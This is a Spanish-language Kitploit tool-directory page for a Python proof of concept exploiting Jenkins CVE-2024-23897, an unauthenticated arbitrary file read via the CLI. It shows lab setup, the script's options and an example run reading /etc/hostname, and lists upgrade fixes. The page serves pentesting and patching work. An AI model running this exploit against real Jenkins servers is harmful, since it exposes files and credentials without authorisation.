Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Jenkins-CVE-2024-23897 — PoC en Python para CVE-2024-23897 de Jenkins, lectura arbitraria de archivos a través de la CLI, exponiendo divulgación de archivos no autenticada con múltiples métodos de explotación. | Kitploit
Herramientas/GitHubGitHub/abraxa5/jenkins-cve-2024-23897
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónRed Teaming
GitHubabraxa5/jenkins-cve-2024-23897

Jenkins-CVE-2024-23897

PoC en Python para CVE-2024-23897 de Jenkins, lectura arbitraria de archivos a través de la CLI, exponiendo divulgación de archivos no autenticada con múltiples métodos de explotación.

Ver RepositorioSitio web
111hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Jenkins CVE-2024-23897 PoC

Una prueba de concepto (PoC) para CVE-2024-23897, una vulnerabilidad de lectura arbitraria de archivos en la interfaz de línea de comandos (CLI) integrada de Jenkins. Permite a atacantes no autenticados con permiso Overall/Read leer archivos arbitrarios en el sistema de archivos del controlador de Jenkins.

Versiones afectadas

  • Versiones de Jenkins <= 2.441
  • Versiones LTS de Jenkins <= 2.426.2

Configurar una instancia vulnerable

Inicia una instancia vulnerable local usando docker compose:

root@kitploit:~
cd docker
docker compose up -d

La instancia estará disponible en http://localhost:1234

Explotación

root@kitploit:~
❯ python CVE-2024-23897.py --help
usage: CVE-2024-23897.py [-h] [--url URL] [--file FILE] [--method {1,2,3}]

Jenkins CVE-2024-23897 file-read PoC

options:
  -h, --help        show this help message and exit
  --url URL         URL for Jenkins instance (default: http://localhost:1234)
  --file FILE       File to read (default: /etc/hostname)
  --method {1,2,3}  The method to use [connect-node(1), who-am-i(2), or help(3)] (default: 1)

Ejemplo

root@kitploit:~
❯ python CVE-2024-23897.py --url 'http://127.0.0.1:1234/' --file '/etc/hostname'
[i] Vulnerable to CVE-2024-23897 (Jenkins v2.441 <= 2.441)
[*] Target URL http://127.0.0.1:1234/cli?remoting=false
[*] Attempting to read /etc/hostname
[i] Download request done
[+] Found data, printing...


ERROR: No such agent "jenkins_vuln_instance" exists.

[i] Upload request done
[i] All threads completed

El script puede tener problemas al leer archivos más grandes debido a la concurrencia y los tiempos de espera de conexión. Para más detalles técnicos y un recorrido por la vulnerabilidad, echa un vistazo a mi publicación en el blog sobre el tema.

Solución

  • Actualiza a Jenkins 2.442 o LTS 2.426.3
  • Aplica soluciones temporales según se describe en el aviso de seguridad de Jenkins.

Enlaces relacionados

  • Sonar Source | Expansión excesiva: Descubriendo vulnerabilidades críticas de seguridad en Jenkins
  • Aviso de seguridad de Jenkins - 2024-01-24
  • Qualys ThreatPROTECT | Vulnerabilidad de ejecución remota de código en Jenkins Core (CVE-2024-23897)
  • CVE-2024-23897: Evaluando el impacto de la vulnerabilidad de fuga de archivos arbitrarios en Jenkins – Horizon3.ai
Descargar herramienta